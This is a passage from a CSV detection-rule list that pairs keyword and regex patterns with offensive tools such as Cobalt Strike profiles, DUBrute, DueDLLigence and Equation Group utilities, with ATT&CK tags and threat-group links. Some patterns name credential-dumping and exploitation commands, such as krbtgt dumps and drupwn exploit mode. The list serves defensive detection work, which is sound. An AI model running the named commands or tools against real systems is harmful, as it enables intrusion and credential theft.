TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","41563" "*droopescan scan drupal -u * -t 32*",".{0,1000}droopescan\sscan\sdrupal\s\-u\s.{0,1000}\s\-t\s32.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41564" "*Droopscan*",".{0,1000}Droopscan.{0,1000}","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify 
issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","EMBER BEAR","Vulnerability Scanner","https://github.com/droope/droopescan","1","0","N/A","N/A","N/A","10","1328","259","2024-01-19T19:58:03Z","2014-10-22T22:06:30Z","41565" "*drop_malleable_unknown_*",".{0,1000}drop_malleable_unknown_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41566" "*drop_malleable_with_invalid_*",".{0,1000}drop_malleable_with_invalid_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41567" 
"*drop_malleable_without_*",".{0,1000}drop_malleable_without_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41568" "*dropboxC2.py*",".{0,1000}dropboxC2\.py.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running 
on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","41572" "*dropper_cs.exe*",".{0,1000}dropper_cs\.exe.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","41573" "*dropper32.exe*",".{0,1000}dropper32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan 
- LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41574" "*dropper64.exe*",".{0,1000}dropper64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41575" "*drops a netcat?? undetectable by antivirus*",".{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","41576" "*DRSAT has injected hooks into process *",".{0,1000}DRSAT\shas\sinjected\shooks\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#content","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","41577" "*drunkpotato.x64.dll*",".{0,1000}drunkpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41578" "*drunkpotato.x86.dll*",".{0,1000}drunkpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41579" "*drupal_enum.py*",".{0,1000}drupal_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","41580" "*drupwn --mode exploit --target *",".{0,1000}drupwn\s\-\-mode\sexploit\s\-\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41581" "*dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did.onion*",".{0,1000}dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense 
Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","41582" "*DSInternals_v4.*.zip*",".{0,1000}DSInternals_v4\..{0,1000}\.zip.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","41590" "*dsnezhkov/shutter*",".{0,1000}dsnezhkov\/shutter.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","1","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","41591" "*dsregcmd.exe /status*",".{0,1000}dsregcmd\.exe\s\/status.{0,1000}","offensive_tool_keyword","dsregcmd","dsregcmd.exe to check the SSO state which might indicate preparation for abusing Azure AD tokens","T1082 - T1087 - T1012","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","41593" "*dsregcmd.exe /status*",".{0,1000}dsregcmd\.exe\s\/status.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure 
authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","41594" "*dswmiexec.exe*",".{0,1000}dswmiexec\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","41595" "*dtd-finder*",".{0,1000}dtd\-finder.{0,1000}","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tool","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","N/A","7","625","109","2024-02-21T00:00:00Z","2019-07-15T20:13:54Z","41596" "*dtmsecurity/bof_helper*",".{0,1000}dtmsecurity\/bof_helper.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","N/A","10","10","228","43","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z","41597" "*DUAR_Survey_v3-cleanedx64.bin*",".{0,1000}DUAR_Survey_v3\-cleanedx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41598" "*DUAR_Survey_v3-cleanedx86.bin*",".{0,1000}DUAR_Survey_v3\-cleanedx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41599" "*DUAR_Survey_v4-cleanedx64.bin*",".{0,1000}DUAR_Survey_v4\-cleanedx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation 
framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41600" "*DUAR_Survey_v4-cleanedx86.bin*",".{0,1000}DUAR_Survey_v4\-cleanedx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41601" "*dubmoat*",".{0,1000}dubmoat.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41602" "*Dubmoat_ExtractData*",".{0,1000}Dubmoat_ExtractData.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41603" "*Dubmoat_PrintFilename*",".{0,1000}Dubmoat_PrintFilename.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41604" 
"*Dubmoat_TruncateFile*",".{0,1000}Dubmoat_TruncateFile.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41605" "*DuBrute v*",".{0,1000}DuBrute\sv.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41606" "*dubrute.exe*",".{0,1000}dubrute\.exe.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41607" "*DUBrute_v*",".{0,1000}DUBrute_v.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41608" "*DuckDuckC2-main*",".{0,1000}DuckDuckC2\-main.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","41609" "*ducky_keyboard_sender(scancode*",".{0,1000}ducky_keyboard_sender\(scancode.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 
- T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41610" "*DueDLLigence.cs*",".{0,1000}DueDLLigence\.cs.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41611" "*DueDLLigence.sln*",".{0,1000}DueDLLigence\.sln.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41612" "*DueDLLigence-master*",".{0,1000}DueDLLigence\-master.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41613" "*dump /service:krbtgt *",".{0,1000}dump\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","41615" "*Dump AAD connect account credential in current context*",".{0,1000}Dump\sAAD\sconnect\saccount\scredential\sin\scurrent\scontext.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41616" "*Dump AD Certificate Services 